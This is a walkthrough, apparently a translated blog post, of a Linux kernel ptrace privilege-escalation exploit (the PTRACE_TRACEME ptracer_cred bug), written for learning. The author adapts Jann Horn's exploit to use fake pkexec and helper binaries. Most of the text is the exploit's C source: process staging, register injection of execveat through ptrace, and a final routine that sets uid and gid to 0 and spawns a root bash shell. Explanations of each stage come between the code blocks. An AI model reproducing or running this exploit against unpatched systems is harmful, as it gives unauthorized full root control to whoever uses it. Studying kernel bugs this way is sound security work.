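bcoles's exploit builds on Jann Horn's and adds code that searches for more helper binaries. Jann Horn's helper is hard-coded and does not exist on many distributions, so his exploit fails on many systems, while bcoles's exploit succeeds on more distributions.

For learning purposes I also wrote one, jiayy's exploit. Helper binaries differ between distributions and pkexec exists only on desktop distributions, yet the bug itself is in the Linux kernel. So I changed Jann Horn's exploit to use a fakepkexec program, with fakepkexec and fakehelper built by hand rather than searched for on the target system. This lets a learner study the exploit on any Linux system that has the bug, with no desktop required.

Exploit analysis

Let's briefly walk through the exploit code.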


167 int main(int argc, char **argv) {
168   if (strcmp(argv[0], "stage2") == 0)
169     return middle_stage2();
170   if (strcmp(argv[0], "stage3") == 0)
171     return spawn_shell();
172 
173   helper_path = "/tmp/fakehelper";
174 
175   /*
176    * set up a pipe such that the next write to it will block: packet mode,
177    * limited to one packet
178    */
179   SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));
180   SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));
181   char dummy = 0;
182   SAFE(write(block_pipe[1], &dummy, 1));
183 
184   /* spawn pkexec in a child, and continue here once our child is in execve() */
185   static char middle_stack[1024*1024];
186   pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),
187                             CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
188   if (!middle_success) return 1;
189 
======================= skip =======================
215 }

Start with line 186: clone is called to create a child process (task B), which runs middle_main.

 64 static int middle_main(void *dummy) {
 65   prctl(PR_SET_PDEATHSIG, SIGKILL);
 66   pid_t middle = getpid();
 67 
 68   self_fd = SAFE(open("/proc/self/exe", O_RDONLY));
 69 
 70   pid_t child = SAFE(fork());
 71   if (child == 0) {
 72     prctl(PR_SET_PDEATHSIG, SIGKILL);
 73 
 74     SAFE(dup2(self_fd, 42));
 75 
 76     /* spin until our parent becomes privileged (have to be fast here) */
 77     int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY));
 78     char *needle = tprintf("\nUid:\t%d\t0\t", getuid());
 79     while (1) {
 80       char buf[1000];
 81       ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));
 82       buf[buflen] = '\0';
 83       if (strstr(buf, needle)) break;
 84     }
 85 
 86     /*
 87      * this is where the bug is triggered.
 88      * while our parent is in the middle of pkexec, we force it to become our
 89      * tracer, with pkexec's creds as ptracer_cred.
 90      */
 91     SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
 92 
 93     /*
 94      * now we execute passwd. because the ptrace relationship is considered to
 95      * be privileged, this is a proper suid execution despite the attached
 96      * tracer, not a degraded one.
 97      * at the end of execve(), this process receives a SIGTRAP from ptrace.
 98      */
 99     puts("executing passwd");
100     execl("/usr/bin/passwd", "passwd", NULL);
101     err(1, "execl passwd");
102   }
103 
104   SAFE(dup2(self_fd, 0));
105   SAFE(dup2(block_pipe[1], 1));
106 
107   struct passwd *pw = getpwuid(getuid());
108   if (pw == NULL) err(1, "getpwuid");
109 
110   middle_success = 1;
111   execl("/tmp/fakepkexec", "fakepkexec", "--user", pw->pw_name, NULL);
112   middle_success = 0;
113   err(1, "execl pkexec");
114 }

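Line 70 calls fork to create the grandchild process (task C).

Then, at line 111, task B runs fakepkexec, which elevates and then drops its privileges.

Now look at lines 76-84: once task C detects that task B's euid has become 0, it runs line 91 to issue PTRACE_TRACEME and capture a root ptracer_cred. Immediately afterwards task C calls execl on a suid binary so that its own euid becomes 0.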
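The polling loop on lines 76-84 boils down to a substring search in the text of /proc/&lt;pid&gt;/status, whose Uid line lists the real, effective, saved and filesystem uid separated by tabs. A stand-alone version of that test might look like this; `status_shows_euid_root` is a name chosen for this sketch, and it works on a buffer so it can be tried without a second process.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * True when the status text contains a Uid line whose real uid is `ruid`
 * and whose effective uid is 0, i.e. the process is inside a setuid-root
 * program started by that user.
 */
static bool status_shows_euid_root(const char *status_text, unsigned ruid)
{
    assert(status_text != NULL);
    char needle[64];

    /* Same pattern as the exploit's needle: "\nUid:\t<ruid>\t0\t" */
    snprintf(needle, sizeof(needle), "\nUid:\t%u\t0\t", ruid);
    return strstr(status_text, needle) != NULL;
}
```

The leading newline keeps the pattern from matching inside another field, and the trailing tab keeps an effective uid such as 0 from matching a longer number that merely starts with 0.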


190   /*
191    * wait for our child to go through both execve() calls (first pkexec, then
192    * the executable permitted by polkit policy).
193    */
194   while (1) {
195     int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY);
196     char buf[16];
197     int buflen = SAFE(read(fd, buf, sizeof(buf)-1));
198     buf[buflen] = '\0';
199     *strchrnul(buf, '\n') = '\0';
200     if (strncmp(buf, basename(helper_path), 15) == 0)
201       break;
202     usleep(100000);
203   }
204 
205   /*
206    * our child should have gone through both the privileged execve() and the
207    * following execve() here
208    */
209   SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
210   SAFE(waitpid(midpid, &dummy_status, 0));
211   fputs("attached to midpid\n", stderr);
212 
213   force_exec_and_wait(midpid, 0, "stage2");
214   return 0;

Back in task A's main function, lines 194-202: once task A sees that task B's comm has changed to the helper's name,
it attaches to B (line 209) and then calls force_exec_and_wait at line 213
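The comm comparison has one subtlety: the kernel keeps at most 15 visible characters of the program name, so a longer helper name only matches on its first 15 characters. The helper below reproduces the check on a buffer using only standard C string functions instead of the GNU `strchrnul` and `basename` used in the exploit; `comm_matches` is a name invented for this sketch.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/*
 * comm_text: contents of /proc/<pid>/comm (name plus trailing newline).
 * path:      full path of the program we are waiting for.
 */
static bool comm_matches(const char *comm_text, const char *path)
{
    assert(comm_text != NULL && path != NULL);
    char comm[16];

    /* Copy the name up to the newline, capped at 15 characters. */
    size_t n = strcspn(comm_text, "\n");
    if (n > sizeof(comm) - 1)
        n = sizeof(comm) - 1;
    memcpy(comm, comm_text, n);
    comm[n] = '\0';

    /* Portable replacement for basename(): text after the last slash. */
    const char *slash = strrchr(path, '/');
    const char *base = slash ? slash + 1 : path;

    /* Compare at most 15 characters, as line 200 of the exploit does. */
    return strncmp(comm, base, 15) == 0;
}
```

For example, the comm text "fakehelper\n" matches the path /tmp/fakehelper, while "fakepkexec\n" does not.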

116 static void force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {
117   struct user_regs_struct regs;
118   struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
119   SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
120   SAFE(waitpid(pid, &dummy_status, 0));
121   SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));
122 
123   /* set up indirect arguments */
124   unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
125   struct injected_page {
126     unsigned long argv[2];
127     unsigned long envv[1];
128     char arg0[8];
129     char path[1];
130   } ipage = {
131     .argv = { scratch_area + offsetof(struct injected_page, arg0) }
132   };
133   strcpy(ipage.arg0, arg0);
134   for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
135     unsigned long pdata = ((unsigned long *)&ipage)[i];
136     SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),
137                 (void*)pdata));
138   }
139 
140   /* execveat(exec_fd, path, argv, envv, flags) */
141   regs.orig_rax = __NR_execveat;
142   regs.rdi = exec_fd;
143   regs.rsi = scratch_area + offsetof(struct injected_page, path);
144   regs.rdx = scratch_area + offsetof(struct injected_page, argv);
145   regs.r10 = scratch_area + offsetof(struct injected_page, envv);
146   regs.r8 = AT_EMPTY_PATH;
147 
148   SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));
149   SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));
150   SAFE(waitpid(pid, &dummy_status, 0));
151 }

force_exec_and_wait uses ptrace to make the tracee call execveat and replace its process image. Here it makes task B execute task A's program (the exploit executable itself) with stage2 as argv[0], which in effect makes task B run middle_stage2.
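The address arithmetic inside force_exec_and_wait is easier to follow in isolation. The sketch below reuses the exploit's `injected_page` layout and computes the pointers that end up in the tracee's registers; `struct exec_args` and `model_exec_args` are names made up for the illustration, and nothing is written to another process.

```c
#include <assert.h>
#include <stddef.h>

/* Same layout as in the exploit: argv, envv, then the two strings. */
struct injected_page {
    unsigned long argv[2];  /* { &arg0, NULL } */
    unsigned long envv[1];  /* { NULL } */
    char arg0[8];           /* "stage2" or "stage3" */
    char path[1];           /* empty string, used with AT_EMPTY_PATH */
};

/* Addresses, in the tracee's address space, passed to execveat(). */
struct exec_args { unsigned long scratch, path, argv, envv, arg0; };

static struct exec_args model_exec_args(unsigned long rsp)
{
    assert(rsp >= 0x1000);
    struct exec_args a;

    /* One page below the stack pointer, rounded down to a page boundary. */
    a.scratch = (rsp - 0x1000) & ~0xfffUL;
    a.argv = a.scratch + offsetof(struct injected_page, argv);
    a.envv = a.scratch + offsetof(struct injected_page, envv);
    a.arg0 = a.scratch + offsetof(struct injected_page, arg0);
    a.path = a.scratch + offsetof(struct injected_page, path);
    return a;
}
```

Because `path` points at an empty string and the flags are AT_EMPTY_PATH, execveat executes the file behind the descriptor itself: fd 0 in task B and fd 42 in task C, both of which were duplicated from the descriptor opened on /proc/self/exe.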

167 int main(int argc, char **argv) {
168   if (strcmp(argv[0], "stage2") == 0)
169     return middle_stage2();
170   if (strcmp(argv[0], "stage3") == 0)
171     return spawn_shell();

middle_stage2 calls force_exec_and_wait as well. This makes task B use ptrace to have task C call execveat, so task C's image is also replaced with the exploit binary, this time with stage3 as argv[0].

153 static int middle_stage2(void) {
154   /* our child is hanging in signal delivery from execve()'s SIGTRAP */
155   pid_t child = SAFE(waitpid(-1, &dummy_status, 0));
156   force_exec_and_wait(child, 42, "stage3");
157   return 0;
158 }

When the exploit binary runs with argv[0] set to stage3, it actually runs spawn_shell, so that is what task C runs in its final stage.

160 static int spawn_shell(void) {
161   SAFE(setresgid(0, 0, 0));
162   SAFE(setresuid(0, 0, 0));
163   execlp("bash", "bash", NULL);
164   err(1, "execlp");
165 }

spawn_shell first uses setresgid/setresuid to set the process's real, effective and saved uid/gid to root. Task C has already executed a suid binary and has euid root, so setresuid/setresgid succeed, and task C becomes a fully root process. Finally it calls execlp to start a shell, which yields a shell with full root privileges.